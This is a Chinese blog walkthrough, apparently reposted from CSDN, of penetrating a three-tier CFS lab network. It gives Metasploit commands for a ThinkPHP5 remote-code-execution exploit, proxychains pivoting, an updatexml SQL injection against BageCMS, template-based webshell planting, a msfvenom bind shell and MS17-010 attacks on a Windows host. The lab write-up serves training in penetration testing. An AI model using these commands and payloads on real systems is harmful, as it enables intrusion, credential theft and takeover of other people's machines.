渗透测试之CFS三层靶机内网渗透

2023年2月17日 141次阅读 来源: blalon

一、环境搭建:

靶机拓扑:

《渗透测试之CFS三层靶机内网渗透》

 

1.添加虚拟网卡:

添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡

VMnet8为NAT模式与外部通信

《渗透测试之CFS三层靶机内网渗透》

2.配置网卡:

target1网络配置:

《渗透测试之CFS三层靶机内网渗透》

target2网络配置:

《渗透测试之CFS三层靶机内网渗透》

target3网络配置:

《渗透测试之CFS三层靶机内网渗透》

 3.web靶机搭建(宝塔面板启动)

启动命令: /etc/init.d/bt start

重启 /etc/init.d/bt restart

默认端口管理8888

环境搭建完 kali能ping通target1  target1能ping通target2   target2能ping通target3  三层网络关系

二、渗透测试:

信息收集:

target1(thinkphp5搭建)

《渗透测试之CFS三层靶机内网渗透》

 使用nmap扫描端口

nmap -sV -p 1-65535 -T4 192.168.234.178

《渗透测试之CFS三层靶机内网渗透》

因为是thinkphp5  想到远程命令执行 (网上很多利用脚本自行选择 我用msf一把梭)

search thinkphp                (查找可利用exp)
use 0                          (选择exp)
set rhosts 192.168.234.178     (目标target1的ip)
set rport 80                   (目标target1的端口)
set lhost 192.168.234.130      (shell接收ip 这里是kali本机ip)
set lport 4444                 (shell接收端口)
run                            (执行exp)

《渗透测试之CFS三层靶机内网渗透》

执行返回一个shell  target1拿下

《渗透测试之CFS三层靶机内网渗透》

信息收集

getuid     
sysinfo
ifconfig

查看ip发现两个ip (22网段是内网网段)

《渗透测试之CFS三层靶机内网渗透》

使用msf添加路由

run autoroute -s 192.168.22.0         添加22网段路由

run autoroute -p                               查看路由

《渗透测试之CFS三层靶机内网渗透》

已经添加路由,但是只有返回的这个shell能访问22网段内网靶机;

使用sock4+proxychains4代理打通内网

use auxiliary/server/socks_proxy 
options
set srvhost 192.168.234.130
set version 4a

《渗透测试之CFS三层靶机内网渗透》 

还需要修改kali /etc/proxychains4.conf文件 (在最后一行添加) 

 《渗透测试之CFS三层靶机内网渗透》

代理下使用namp扫描 

proxychains4 nmap -Pn -sT 192.168.22.0/24

proxychains4 nmap -Pn -sT 192.168.22.129

《渗透测试之CFS三层靶机内网渗透》 内网还有web 配置kali浏览器sock代理

《渗透测试之CFS三层靶机内网渗透》

 《渗透测试之CFS三层靶机内网渗透》

 使用八哥CMS搭建

 使用gobuster扫描目录 (可以先手工测试,我直接使用工具偷懒,反而错过重要信息)

proxychains4  gobuster dir -u http://192.168.22.129/    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php 

《渗透测试之CFS三层靶机内网渗透》访问 robots.txt 发现目录  《渗透测试之CFS三层靶机内网渗透》

 在index.php中发现sql注入提示《渗透测试之CFS三层靶机内网渗透》

 手工报错注入

 爆数据库名:

index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

爆表名:

index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+

《渗透测试之CFS三层靶机内网渗透》

最后爆出数据: admin 123qwe

《渗透测试之CFS三层靶机内网渗透》 

 md5解密后得到后台账号密码 admin 123qwe

登录后台 http://url/index.php?r=admini/default/index

《渗透测试之CFS三层靶机内网渗透》

 内容模板写入shell《渗透测试之CFS三层靶机内网渗透》

《渗透测试之CFS三层靶机内网渗透》

使用AntSword设置代理连接shell

《渗透测试之CFS三层靶机内网渗透》 

《渗透测试之CFS三层靶机内网渗透》 信息收集 发现33网段

《渗透测试之CFS三层靶机内网渗透》

 因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf

 将马子赋执行权限上传到webshell中 同时使用代理开启一个msf

proxychains4 msfconsole

使用代理的msf开启监听

use exploit/multi/handler                      使用监听模块
set payload linux/x86/meterpreter/bind_tcp     设置payload
set lport   4444                               设置接收端口与msfvenoms生成端口一致
set rhost   192.168.22.129                     设置目标主机(target2)

《渗透测试之CFS三层靶机内网渗透》

 拿到 target2 shell《渗透测试之CFS三层靶机内网渗透》

 添加33网段路由

 run autoroute -s 192.168.33.0/24

run autoroute -p

《渗透测试之CFS三层靶机内网渗透》 

 使用msf扫描模块扫描端口

use auxiliary/scanner/portscan/tcp

 《渗透测试之CFS三层靶机内网渗透》

 发现 192.168.33.33 主机并开放 445、3389  敏感端口

《渗透测试之CFS三层靶机内网渗透》

 msf尝试永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010     检测ms17010是否存在

use exploit/windows/smb/ms17_010_psexe     利用ms17010

使用ms17_010_psexe 提示执行成功,但是没有创建会话 (这里不是很明白)

《渗透测试之CFS三层靶机内网渗透》

use auxiliary/admin/smb/ms17_010_command     这个exp可以执行命令

《渗透测试之CFS三层靶机内网渗透》

 至此三台靶机shell拿下了,后续还可以进行很多操作,比如windows提权和centos提权;

    原文作者:blalon
    原文地址: https://blog.csdn.net/LvHLong/article/details/123092182
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞